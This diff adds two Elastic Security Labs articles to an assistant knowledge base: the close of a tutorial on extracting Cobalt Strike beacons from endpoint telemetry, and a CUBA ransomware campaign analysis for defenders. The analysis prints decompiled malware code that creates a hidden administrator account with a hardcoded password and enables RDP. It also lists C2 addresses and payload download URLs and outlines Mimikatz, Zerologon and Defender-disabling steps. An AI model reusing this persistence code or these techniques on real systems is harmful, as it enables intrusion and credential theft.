+![](/assets/images/collecting-cobalt-strike-beacons-with-the-elastic-stack/create-agent-policy.jpg)
+
+Next, click on your new policy and click the “Add integration button.
+
+![](/assets/images/collecting-cobalt-strike-beacons-with-the-elastic-stack/finding-endpoint-integration.jpg)
+
+Finally, we’re going to add the memory and shellcode collection options. Click on the integration name (“Endpoint Security”).
+
+![](/assets/images/collecting-cobalt-strike-beacons-with-the-elastic-stack/overview-with-endpoint-security.jpg)
+
+Under “Protections”, leave the different protection types selected, but change the Protection level from “Prevent” to “Detect”. This will allow malware to continue to run to allow for more rich event collection. There are several types of Protections (Malware, Memory, etc.), select “Detect” for each type that has Windows as an available “Operating system”; you can uncheck Mac and Linux Operating Systems. **If you are enabling this feature for a production environment, leave the Protection levels as “Prevent”**
+
+![](/assets/images/collecting-cobalt-strike-beacons-with-the-elastic-stack/setting-policy-to-detect.jpg)
+
+At the bottom of the integration configuration page, you can toggle “Register as antivirus” so that the Elastic Agent is registered as the Antivirus solution, and disable Windows Defender. Click on “Show advanced settings”.
+
+![](/assets/images/collecting-cobalt-strike-beacons-with-the-elastic-stack/register-as-antivirus.jpg)
+
+At the very bottom of the advanced settings page, type “true” for the windows.advanced.memory_protection.shellcode_collect_sample and windows.advanced.memory_protection.memory_scan_collect_sample settings, and then click “Save integration”.
+
+![](/assets/images/collecting-cobalt-strike-beacons-with-the-elastic-stack/collect-sample.jpg)
+
+Once you have created this specific Fleet policy, you can apply this policy to an endpoint running the Elastic Agent. For specific instructions on how to deploy the Elastic Agent, refer to the [official Elastic documentation](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html#install-fleet-managed-agent).
+
+## Collecting the Beacon
+
+Now that we’ve made a collection policy and applied it to a Windows machine you can target it with a CobaltStrike campaign. Instead of mimicking what a CobaltStrike beacon could look like in a lab, we’re going to use live CobaltStrike beacon payloads from Elastic’s telemetry.
+
+To find Cobalt Strike beacon payloads, you can use the Discover app in Kibana to return events identified as Cobalt Strike. These events are provided by the Elastic Endpoint Security Agent, which identifies Cobalt Strike beacons and modules with the “Windows.Trojan.CobaltStrike” malware signature. A simple [Kibana Query Language (KQL)](https://www.elastic.co/guide/en/kibana/current/kuery-query.html) search is as simple as:
+
+```
+KQL search for Cobalt Strike
+
+event.category:(malware or intrusion_detection) and
+rule.name:(Windows.Trojan.CobaltStrike or Windows.Trojan.Cobaltstrike)
+```
+
+![](/assets/images/collecting-cobalt-strike-beacons-with-the-elastic-stack/viewing-cs-alerts.jpg)
+
+Next, let’s filter on documents that have the process.Ext.memory_region.bytes_compressed field (this is a field populated by the windows.advanced.memory_protection.shellcode_collect_sample and windows.advanced.memory_protection.memory_scan_collect_sample settings we configured in the Fleet policy above). To do that we can simply add a filter for the process.Ext.memory_region.bytes_compressed_present field with a value of true.
+
+![](/assets/images/collecting-cobalt-strike-beacons-with-the-elastic-stack/compressed_present-field.jpg)
+
+Finally, add the process.Ext.memory_region.bytes_compressed field to our view so that we can see the value of the field.
+
+![](/assets/images/collecting-cobalt-strike-beacons-with-the-elastic-stack/bytes_compressed-add.jpg)
+
+We can see that we have 133 examples with data in the process.Ext.memory_region.bytes_compressed field. This field contains the file extracted from the memory of the infected host and then zlib deflated and Base64 encoded.
+
+![](/assets/images/collecting-cobalt-strike-beacons-with-the-elastic-stack/number-of-events.jpg)
+
+Now that we’ve collected the file in the Elastic Stack, let’s turn that raw data into a file that we can analyze.
+
+There is a lot of nuance between operating systems on how to decode Base64 and inflate zlib deflated files. If you’d prefer to use your command line or local tools, feel free to do so. That said, [CyberChef](https://gchq.github.io/CyberChef) is a browser-based data parser that is provided for free by the United Kingdom’s Government Communications Headquarters (GCHQ).
+
+Using the CyberChef web application, add the “From Base64” and “Zlib Inflate” [recipes](<https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Zlib_Inflate(0,0,'Adaptive',false,false)>)and then paste the contents of the process.Ext.memory_region.bytes_compressed field into the ).
+
+Click on the disk icon to download the inflated binary.
+
+![](/assets/images/collecting-cobalt-strike-beacons-with-the-elastic-stack/cyber-chef.jpg)
+
+Running the file command, we can see that this is a Portable Executable (PE) file that can be analyzed by a malware reverse engineer (RE).
+
+```
+Using the file command to validate the file type
+
+$ file beacon.exe
+
+beacon.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
+
+
+```
+
+While an RE can identify a tremendous amount of information, let’s explore what additional information a non-RE can obtain from this file.
+
+## Next Steps
+
+In the next [release](https://www.elastic.co/security-labs/extracting-cobalt-strike-beacon-configurations), we’ll use the beacon that we’ve just collected and extract its configuration. With this information, we’ll be able to identify other important elements such as license identifications, watermarks, and atomic indicators.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cuba_ransomware_campaign_analysis.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cuba_ransomware_campaign_analysis.md
new file mode 100644
index 0000000000000..d96fa268a7f3e
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cuba_ransomware_campaign_analysis.md
@@ -0,0 +1,522 @@
+---
+title: "CUBA Ransomware Campaign Analysis"
+slug: "cuba-ransomware-campaign-analysis"
+date: "2022-09-08"
+description: "Elastic Security observed a ransomware and extortion campaign leveraging a combination of offensive security tools, LOLBAS, and exploits to deliver the CUBA ransomware malware."
+author:
+  - slug: daniel-stepanic
+  - slug: derek-ditch
+  - slug: seth-goodwin
+  - slug: salim-bitam
+  - slug: andrew-pease
+image: "blog-thumb-hard-drives.jpg"
+category:
+  - slug: campaigns
+tags:
+  - ref9019
+  - cuba
+  - ransomware
+---
+
+## Key Takeaways
+
+- The Elastic Security Team is tracking an organized and financially-motivated ransomware and extortion group called Cuba Ransomware
+- Cuba Ransomware targets small and medium-sized retailers, exfiltrating sensitive information, and then deploying ransomware
+- Cuba Ransomware uses a “name and shame” approach by releasing exfiltrated data as an additional method to extort ransomware cryptocurrency payments
+- We are releasing a YARA signature and providing hunting queries that detect this ransomware family
+
+> For information on the CUBA ransomware campaign and associated malware analysis, check out our blog posts detailing this:
+>
+> - [CUBA Malware Analysis](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis)
+> - [BUGHATCH Malware Analysis](https://www.elastic.co/security-labs/bughatch-malware-analysis)
+
+## Preamble
+
+The Elastic Security Team is tracking a threat group that is leveraging the Cuba Ransomware, combined with data exfiltration and extortion, to target North American and European retailers and manufacturers for cryptocurrency payments. The threat group has followed an effective, but repetitive cluster of TTPs for initial access, lateral movement, exfiltration, ransomware deployment, and extortion.
+
+## Initial Access
+
+The incidents that we have observed included hosts that were infected with a litany of initial access opportunities. These included everything from potentially unwanted programs (PUP) to remotely executable vulnerabilities. Because of this, we cannot verify what the initial access vehicle was, but there are two theories:
+
+- An access broker
+- A remotely exploitable vulnerability
+
+While there are many ways to gain access into a targeted network, we’ll explore the most likely hypotheses for how the CUBA threat group gained access.
+
+### Access Broker
+
+As an introduction, an access broker is a threat group who, as they move through the [kill chain](https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html), has their “actions on objective” as collecting and maintaining remote access into a targeted network so that access can be sold to other threat groups who have other goals.
+
+This is a common tactic for ransomware campaigns where the goal is to rapidly encrypt and extort victims into paying to recover data. When using ransomware kits (ransomware-as-a-service), the threat actors are often focused on moving rapidly across many victims and not on the reconnaissance required to identify and exploit victims to deploy their ransomware.
+
+Ransomware-as-a-service includes a lot of overhead such as negotiating with victims, troubleshooting unlock procedures, and managing the crypto infrastructure. It is often easier to purchase previously exploited systems that allow the ransomware campaign owners to be “shell wranglers” instead of needing to gain and maintain access to a large number of environments.
+
+The theory that an initial access broker may have been used began percolating because we observed access attempts using an Exchange vulnerability in multiple contested networks; however, all networks did not receive the CUBA ransomware. Additionally, we observed initial access attempts in January but did not observe CUBA ransomware until March which would align with an access broker gaining and maintaining persistence while shopping for a buyer.
+
+In the environments where the CUBA ransomware was not deployed, the incident response was rapid, however incomplete, and access was regained. Once the persistence was observed, the adversary was successfully evicted and CUBA was never deployed.
+
+### Remotely Exploitable Vulnerability
+
+We observed the execution of the ProxyLogon exploit. [<u>Previous research</u>](https://www.mandiant.com/resources/unc2596-cuba-ransomware) has observed this threat group leveraging [<u>ProxyLogon</u>](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855) and [<u>ProxyShell</u>](https://www.mandiant.com/resources/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers) vulnerabilities to gain initial access.
+
+```
+c:\windows\system32\inetsrv\w3wp.exe, -ap, MSExchangeOWAAppPool, -v, v4.0, -c, C:\Program Files\Microsoft\Exchange Server\V15\bin\GenericAppPoolConfigWithGCServerEnabledFalse.config, -a, \\.\pipe\[redacted], -h, C:\inetpub\temp\apppools\MSExchangeOWAAppPool\MSExchangeOWAAppPool.config, -w, (empty), -m, 0
+```
+
+In each case REF9019 activity was traced back to Windows servers running Microsoft’s Exchange Server. Although we do not have information on the patch levels of those machines at the time of the execution or the exact vulnerabilities exploited, there is corroborating evidence regarding the exploitation of publicly accessible Exchange servers at this time generally, as well as specific reporting tied to the CUBA threat actor exploiting them.
+
+This information combined with the lack of activity preceding this event, as well as the order of tactics after, indicates that in both cases exploitation of publicly accessible Exchange servers initiated the compromise.
+
+> While analyzing certain alerts throughout these events, we used data present in the process.Ext.memory_region.bytes_compressed field, and the technique we described in our [Cobalt Strike series](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack), to extract the memory-resident binaries and shellcode.
+
+## Establish Foothold
+
+### afk.ttf
+
+This exploitation attempt preceded one primary infection by about 6 weeks. It appears a tactics shift occurred in the intervening period.
+
+The file afk.ttf has been identified as a variant of “ZenPak” by some vendors on VirusTotal. ZenPak is categorized as a generic Trojan which has been associated with the Bazar malware family. The BazarBackdoor has a long history and was recently sighted in ransomware-as-a-service campaigns.
+
+Initially, afk.ttf was identified through a malicious_file alert when it was created by the IIS worker process (w3wp.exe) handling the Exchange Service.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image14-cuba-ransomware-elastic.png)
+
+The afk.ttf file is a 64-bit Windows DLL that has a single export, bkfkals. Next, afk.ttf is loaded by rundll32.exe (spawned by w3wp.exe) which unpacks shellcode in memory and executes it. The unpacked shellcode is a Meterpreter payload from the offensive security framework, [Metasploit](https://github.com/rapid7/metasploit-framework).
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image16-cuba-ransomware-elastic.png)
+
+Following this, afk.ttf uses an injection technique that allows the injected code to run before the entry point of the main thread of the process. This is known as [Early Bird injection](https://www.cyberbit.com/endpoint-security/new-early-bird-code-injection-technique-discovered/) and is used in this situation to inject the shellcode in a suspended process for nslookup 8.8.8.8. Once the shellcode was deobfuscated for execution, the Elastic Agent identified and prevented the Metasploit payload.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image10-cuba-ransomware-elastic.jpg)
+
+Using the process.Ext.memory_region.bytes_compressed field we were able to recover the memory snapshot from these two alerts and verified that the shellcode was Meterpreter, which is part of the Metasploit framework. Additionally, we were able to extract the C2 IP (159.203.70[.]39) and URI (/Time/cb6zubbpio...truncated...).
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image27-cuba-ransomware-elastic.jpg)
+
+Ultimately this foothold was either never established, or abandoned because there is no further activity from this endpoint until it is re-exploited about 6 weeks later.
+
+### add2.exe
+
+The primary execution chain of both infections started with a malicious_file alert that fired upon the creation and execution of add2.exe by the IIS worker process handling the Exchange service. This was the same technique observed previously with the afk.ttf attempt. Interestingly, these executions happened within about 15 minutes of each other on victims in different countries and different industry verticals.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image24-cuba-ransomware-elastic.png)
+
+The Elastic Malware Analysis and Reverse Engineering (MARE) team was able to [<u>find this file in VirusTotal</u>](https://www.virustotal.com/gui/file/728994be6b928de3d1c7b49ca1c79db8656c1cf4b95a1e508a6be48c6ab407da/detection) and pull it down for binary analysis.
+
+```
+BOOL sub_4013B0()
+{
+  int v1;
+  int v2;
+  WCHAR REMOTE_DESKTOP_USERS_groups_list[256];
+  WCHAR ADMINS_groups_list[256];
+  char password[44];
+  wchar_t username[9];
+  v2 = enum_local_groups(DOMAIN_ALIAS_RID_ADMINS, ADMINS_groups_list);
+  v1 = enum_local_groups(DOMAIN_ALIAS_RID_REMOTE_DESKTOP_USERS, REMOTE_DESKTOP_USERS_groups_list);
+  if ( v2 || v1 )
+  {
+    wcscpy(username, L"Mysql");
+    qmemcpy(password, L"KJaoifhLOaiwdhadx1@!", 0x2Au);
+    if ( Add_user((int)username, (int)password) )
+    {
+      if ( v2 )
+        add_user_groups(ADMINS_groups_list, (int)username);
+      if ( v1 )
+        add_user_groups(REMOTE_DESKTOP_USERS_groups_list, (int)username);
+      hide_accountName(username); SpecialAccounts\\UserList regkey
+    }
+  }
+  return enable_RDP();
+}
+```
+
+MARE determined that this executable performs several functions:
+
+Enumerates local administrator and RDP groups.
+
+```
+ WCHAR REMOTE_DESKTOP_USERS_groups_list[256];
+  WCHAR ADMINS_groups_list[256];
+  char password[44];
+  wchar_t username[9];
+  v2 = enum_local_groups(DOMAIN_ALIAS_RID_ADMINS, ADMINS_groups_list);
+  v1 = enum_local_groups(DOMAIN_ALIAS_RID_REMOTE_DESKTOP_USERS, REMOTE_DESKTOP_USERS_groups_list);
+  if ( v2 || v1 )
+```
+
+Creates a new user Mysql, sets the password to KJaoifhLOaiwdhadx1@!, and sets no expiration date (0x2Au).
+
+```
+  wcscpy(username, L"Mysql");
+    qmemcpy(password, L"KJaoifhLOaiwdhadx1@!", 0x2Au);
+    if ( Add_user((int)username, (int)password) )
+```
+
+Adds this user to the previously enumerated local administrative and RDP groups.
+
+```
+ if ( v2 )
+        add_user_groups(ADMINS_groups_list, (int)username);
+      if ( v1 )
+        add_user_groups(REMOTE_DESKTOP_USERS_groups_list, (int)username);
+```
+
+Sets the SpecialAccounts\UserList regkey for this user to hide the user from login screens and the control panel.
+
+```
+ hide_accountName(username); regkey
+```
+
+Enables RDP by setting the `fDenyTSConnections` value to false in the Registry.
+
+```
+return enable_RDP();
+```
+
+In total, add2.exe establishes local persistence via a hidden user and opening of a remote access service. This enables the REF9019 actor to connect back to this machine in case of discovery, patching of the vulnerability, or an incomplete eviction.
+
+Additionally, VirusTotal indicated on the [graph page](https://www.virustotal.com/graph/728994be6b928de3d1c7b49ca1c79db8656c1cf4b95a1e508a6be48c6ab407da) that this file has been hosted at `http://208.76.253[.]84`.
+
+Of particular note, within the strings of add2.exe, we identified a unique program database file (PDB) named AddUser.pdb. PDB files are used to map elements of source code to the compiled program.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image8-cuba-ransomware-elastic.jpg)
+
+Searching in VirusTotal for the HEX value of F:\Source\WorkNew17\ (​​content:\{463a5c536f757263655c576f726b4e65773137\}), we identified another file named ad.exe which shared the same folder structure, and included another PDB file, CmdDLL.pdb.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image9-cuba-ransomware-elastic.jpg)
+
+VirusTotal shows on the [graph page](https://www.virustotal.com/graph/http%253A%252F%252F108.170.31.115%252Fadd.dll) that this file has been hosted at `http://108.170.31[.]115/add.dll``. While we did not observe add.dll, we believe they are related and have included the name, hash, and IP in our Observables table as the IP address (108.170.31[.]115) was also [reported](https://www.virustotal.com/gui/ip-address/108.170.31.115/relations) distributing ra.exe (see the NetSupport section below).
+
+Using this same search criteria, we were able to locate [three](https://any.run/report/bd270853db17f94c2b8e4bd9fa089756a147ed45cbc44d6c2b0c78f361978906/e1579345-7571-4dcb-af4c-e74a4a81d804) [other](https://any.run/report/2213db3f856cbed85a52cfa0275fa6eaba8e852a7e78449ab469d85d1945dc80/ed6077c3-6e2a-4f74-a761-cc0a354cc159) [files](https://www.joesandbox.com/analysis/417560/1/html) with the same PDB debugging artifacts.[<u>SystemBC</u>](https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc) is a socks5 backdoor with the ability to communicate over TOR.
+
+## Remote Access Tools
+
+After establishing a beachhead, REF9019 dropped tooling to manage the post-exploitation phase of the attacks. Notably all tools were not present in each attack. It’s unclear if the decision to use one tool over another was merely driven by preference of individual operators, or if there was an operational factor that contributed to the decision.
+
+### SystemBC
+
+[<u>SystemBC</u>](https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc) is a socks5 backdoor with the ability to communicate over TOR.
+
+It was identified via malware_signature alerts that ran after SystemBC was injected into a svchost.exe process.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image10-cuba-ransomware-elastic.jpg)
+
+Post processing of the compressed_bytes of the shellcode_thread alert exposed network indicators our sample utilized, including its command and control server (104.217.8[.]100:5050).
+
+> Check out AhnLab’s ASEC blog for [detailed coverage of SystemBC’s features](https://asec.ahnlab.com/en/33600/).
+
+Let’s look at the data for the SystemBC binary that was collected from the process.Ext.memory_region.bytes_compressed field.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image15-cuba-ransomware-elastic.jpg)
+
+If we run this through the strings command, it becomes a bit more readable. As mentioned above, the work done by the team at ASEC does a tremendous job of describing the SystemBC remote access tool, so we’ll focus on the atomic indicators that we observed.
+
+```
+…truncated…
+BEGINDATA
+HOST1:104.217.8[.]100
+HOST2:104.217.8[.]100
+PORT1:5050
+…truncated…
+193.23.244[.]244
+86.59.21[.]38
+199.58.81[.]140
+204.13.164[.]118
+194.109.206[.]212
+131.188.40[.]189
+154.35.175[.]225
+171.25.193[.]9
+128.31.0[.]34
+128.31.0[.]39
+/tor/status-vote/current/consensus
+/tor/server/fp/
+…truncated…
+```
+
+The values of HOST1 and HOST2 are [<u>well-documented</u>](https://bazaar.abuse.ch/sample/6b36e8569a8b6150d760c3cfa1f23ff6072d2ab3bedd3633dc269ea6fd5fff9e/)[<u> infrastructure</u>](https://otx.alienvault.com/indicator/file/b9446c5f3fb7dd19e9f495d88431df2f0899ecb2) for the SystemBC tool. The list of 10 IP addresses is Tor [<u>directory authorities</u>](https://metrics.torproject.org/glossary.html#directory-authority). One IP address is selected from the list to get the [<u>consensus data</u>](https://metrics.torproject.org/glossary.html#consensus) for the Tor network. Then it will start Tor communications based on the settings it received (as previously reported by ASEC).
+
+While we were not able to identify if Tor traffic was executed, this could have been a clandestine way to exfiltrate sensitive data.
+
+### GoToAssist
+
+[<u>GoToAssist</u>](https://en.wikipedia.org/wiki/RescueAssist) is a remote desktop support application with some legitimate usage, but also known for its use in tech support scams.In this incident, it was used to download a malicious DLL to the newly created user’s downloads directory (C:\Users\Mysql\Downloads\94-79.dll). We were unable to collect this file and have not observed it later in the incident, however previous reporting has indicated use in CUBA campaigns of DLLs with similar naming conventions.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image21-cuba-ransomware-elastic.png)
+
+### NetSupport
+
+NetSupport Manager is another client-server remote desktop management application. In this incident, NetSupport was named ra.exe and was written and executed from the C:\programdata\ directory by the previously exploited IIS worker process (w3wp.exe). ra.exe has been distributed by a previously identified IP address (see add2.exe section above).
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image4-cuba-ransomware-elastic.png)
+
+Our sample is the [<u>NetSupportManager RAT</u>](https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat) as indicated on [<u>VirusTotal</u>](https://www.virustotal.com/gui/file/5669f6a48dac80717fa5770fa3be6c18022a7633b996ccf0df6b468994085378) and corroborates [<u>prior reporting</u>](https://www.mandiant.com/resources/unc2596-cuba-ransomware) of its usage with the CUBA Ransomware group.When analyzing the process data that we extracted from memory we can see that
+
+### Cobalt Strike
+
+Cobalt Strike was used in these intrusions, we confirmed this while reviewing the value of the [<u>Target.process.thread.Ext.start_address_bytes</u>](https://docs.elastic.co/en/integrations/endpoint) (a few (typically 32) raw opcode bytes at the thread start address, hex-encoded). Upon doing this, we observed bytes commonly observed in Cobalt Strike payloads.
+
+When analyzing the process data that we extracted from memory we can see that dhl.jpg (from mvnetworking[.]com) and temp.png (from bluetechsupply[.]com) are being used for command and control. This is corroborated by [<u>previous </u>](https://twitter.com/drb_ra/status/1482117406122201095)[<u>research</u>](https://www.darktrace.com/en/inside-the-soc/how-antigena-intercepted-and-delayed-a-cobalt-strike-intrusion/).
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image6-cuba-ransomware-elastic.jpg)
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image3-cuba-ransomware-elastic.jpg)
+
+Looking at the domains in Shodan ([[<u>1</u>](https://www.shodan.io/search?query=mvnetworking.com)][[<u>2</u>](https://www.shodan.io/search?query=bluetechsupply.com)]), we can see that they are both categorized as Cobalt Strike beacon C2 infrastructure.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image25-cuba-ransomware-elastic.jpg)
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image13-cuba-ransomware-elastic.jpg)
+
+Both sites are hosted by a cloud provider, Hivelocity, Inc. We have requested the domains be taken down.
+
+### BUGHATCH
+
+BUGHATCH is the name given to a Cuba Ransomware associated downloader by Mandiant in their blog on [<u>UNC2596</u>](https://www.mandiant.com/resources/unc2596-cuba-ransomware). We detail the observed execution chain and indicators below.
+
+BUGHATCH was launched via PowerShell script stagers in both cases. One execution was following the dropping of a malicious DLL to the Mysql user’s downloads folder (C:\Users\Mysql\Downloads\14931s.dll). Download URI for the next stage was found in the Target.process.Ext.memory_region.strings (`http://64.235.39[.]82/Agent32.bin`).
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image26-cuba-ransomware-elastic.jpg)
+
+In the above example, we observed agsyst82.ps1 downloading Agent32.bin from 64.235.39[.]82, but were unable to collect the PowerShell script. However, while performing open-source research, we identified a PowerShell script on ANY.RUN that performed network connections to the same IP and URL (`http://64.235.39[.]82/Agent32.bin`). The script is named komar.ps1 in ANY.RUN’s analysis. We are associating these two PowerShell scripts and network activity together.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image2-cuba-ransomware-elastic.jpg)
+
+The other PowerShell script was called by a malicious file, cps.exe. This PowerShell script is called komar2.ps1 and downloads Agent32.bin from 38.108.119[.]121.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image28-cuba-ransomware-elastic.jpg)
+
+komar2.ps1 next attempts to inject itself into svchost.exe from C:\Windows\Sysnative\svchost.exe.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image17-cuba-ransomware-elastic.png)
+
+> For context, the C:\Windows\Sysnative path is a legitimate Windows directory and used to allow 32-bit applications to access the System32 folder on a 64-bit version of Windows. This path has also been observed as a [SpawnTo parameter](https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/) in Cobalt Strike process injection configurations.
+
+This new injected process again executes komar2.ps1 and includes a new PDB entry of F:\Source\Mosquito\Agent\x64\Release\Agent.pdb. As we discussed above, “komar” means “mosquito” in Polish and is a good indicator as a way to identify other related entities; we see “Mosquito” in the path of the PDB. While a weak association by itself, the PDB in this sample is located in F:\Source\, which is the same location that we’d observed with F:\Source\WorkNew## above for add2.exe. By themselves, they are not a solid reference point between the two samples, but when compared together, they can be categorized as “interesting”.
+
+Based on analysis of the Agent32.bin file, we believe that this is the BUGHATCH malware. BUGHATCH has been observed being used as a downloader in CUBA ransomware incidents. This aligns to how we observed Agent32.bin. BUGHATCH has been [<u>covered in the UNC2596 blog</u>](https://www.mandiant.com/resources/unc2596-cuba-ransomware) by the team at Mandiant.
+
+## Credential Harvesting, Internal Reconnaissance, and Lateral Movement
+
+Credential harvesting was observed through process injection into the GoToAssistUnattendedUi.exe binaries. These appear to be the legitimate files for the Go To Assist suite. The credential harvesting was accomplished by using Meterpreter and Mimikatz.
+
+### Meterpreter
+
+As we observed in the initial infection several months prior, Meterpreter was observed being used to collect the SAM database using the [<u>hashdump module</u>](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/#:~:text=SYSTEM%0Ameterpreter%20%3E-,hashdump,-The%20hashdump%20post). As previously, this was observed in the Target.process.Ext.memory_region.strings fields.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image18-cuba-ransomware-elastic.jpg)
+
+### Mimikatz
+
+Similarly to the Meterpreter tool markings, we also observed [<u>Mimikatz</u>](https://attack.mitre.org/software/S0002/). Mimikatz is an offensive security tool used to collect and inject passwords from compromised systems. It uses the [<u>SEKURLSA::LogonPasswords</u>](https://adsecurity.org/?page_id=1821#SEKURLSALogonPasswords) module to list all available provider credentials, and this was observed in the Target.process.Ext.memory_region.strings fields.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image22-cuba-ransomware-elastic.jpg)
+
+### Zerologon Exploit
+
+Next the threat actors attempted to use a file called zero.exe, which is used to exploit the [<u>Zerologon vulnerability</u>](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472) to escalate privileges. This file is referenced in [<u>previous reporting</u>](https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/) and is executed on a vulnerable domain controller to dump the NTLM hash for the Administrator. This is a common tactic for lateral movement and to deploy additional implants into the environment, such as Cobalt Strike.
+
+### PsExec
+
+[<u>PsExec</u>](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) is a legitimate utility, part of the SysInternals suite of tools, used to interactively launch processes on remote systems. PsExec is a common tool for remote administration, both benign and malicious.
+
+While we cannot validate how specifically PsExec was used because there was not an SMB parser on the infected hosts, we can see that PsExec was used to move files between the infected hosts. We cannot confirm that this was not normal administration by the local IT staff, but the only activity observed was between infected hosts and was within the time window of other confirmed malicious activity.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image5-cuba-ransomware-elastic.jpg)
+
+### Using LOLBAS
+
+[<u>Living off the land binaries, scripts, and libraries (LOLBAS)</u>](https://lolbas-project.github.io/#) is a commonly leveraged method to use native and benign tools for malicious purposes. This reduces attacker tools that need to be moved into the environment as well as to appear more like legitimate processes running in a targeted environment.
+
+In one intrusion we observed PsExec being used to remotely copy files (see the PsExec section), however in another environment, we observed similar activity to move files using cmd.exe to move files from one host to another. We were unable to collect the files that were being moved for analysis, but they were a DLL and a Batch file named d478.dll and d478.bat, and the atomic indicators are stored in the Observations table.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image11-cuba-ransomware-elastic.jpg)
+
+## Data Exfiltration
+
+The CUBA group belongs to a variant of ransomware operators in that they use extortion as a mechanism to coerce payments from their victims.
+
+In these situations, once initial access and a foothold is achieved, threat actors will identify potentially sensitive data and exfiltrate it off of the environment to use for threats of “name and shame”.
+
+The CUBA group runs a website on the dark web where they release data from victims that do not pay. CUBA releases some data for free, and for others that are more lucrative, have a payment option.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image7-cuba-ransomware-elastic.jpg)
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image20-cuba-ransomware-elastic.jpg)
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image12-cuba-ransomware-elastic.jpg)
+
+There are multiple ways that the victim data could have been exfiltrated for extortion, the presence of BUGHATCH, Meterpreter, and Cobalt Strike all have data movement capabilities.
+
+## Defense Evasion and Actions on the Objective
+
+### DefenderControl.exe
+
+To prevent the detection of their malware, the threat actors used [<u>Defender Control</u>](https://www.sordum.org/9480/defender-control-v2-1/) as a way to disable Microsoft Defender, the native antivirus built into all Windows systems since Vista.
+
+To ensure that Defender Control continued to run, the threat actor used svchost.exe to create a scheduled task.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image1-cuba-ransomware-elastic.jpg)
+
+### CUBA Ransomware
+
+We detail the observed execution chain and indicators above, but please see Elastic MARE’s detailed reverse engineering of this sample [here](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis).
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image223-cuba-ransomware-elastic.jpg)
+
+## Diamond Model
+
+Elastic Security utilizes the [<u>Diamond Model</u>](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a, although cluttered, single diamond.
+
+![](/assets/images/cuba-ransomware-campaign-analysis/image224-cuba-ransomware-elastic.png)
+
+## Observed Adversary Tactics and Techniques
+
+### Tactics
+
+Using the MITRE ATT&CK® framework, tactics represent the why of a technique or sub technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- Initial access
+- Persistence
+- Privilege escalation
+- Defense evasion
+- Credential access
+- Discovery
+- Lateral movement
+- Command & Control
+- Exfiltration
+- Impact
+
+It should be noted that we did not observe the Collection tactic, but based on the evidence of Exfiltration and Impact, this would have been completed.
+
+### Techniques / Sub Techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+As noted throughout this research, this covered multiple victims over a large period of time. The CUBA intrusion set has been reported using different techniques and sub techniques, but these are our specific observations.
+
+Observed techniques/sub techniques.
+
+- Exploit Public-Facing Application
+- Command and Scripting Interpreter - PowerShell, Windows Command Shell
+- Scheduled Task/Job - Scheduled Task
+- Boot or Logon Autostart Execution - Registry Run Keys/Startup Folder
+- Create Account - Local Account
+- OS Credential Dumping - LSA Secrets
+- Data Encrypted for Impact
+- Hide Artifact - Hidden Window
+- Masquerading - Match Legitimate Name or Location
+- Obfuscated Files or Information
+- Reflective Code Loading
+
+## Detection
+
+### YARA
+
+Elastic Security has created YARA rules to identify this BUGHATCH and CUBA ransomware activity.
+
+```
+rule Windows_Trojan_Bughatch {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2022-05-09"
+        last_modified = "2022-05-09"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "Bughatch"
+        threat_name = "Windows.Trojan.Bughatch"
+        reference_sample = "b495456a2239f3ba48e43ef295d6c00066473d6a7991051e1705a48746e8051f"
+    strings:
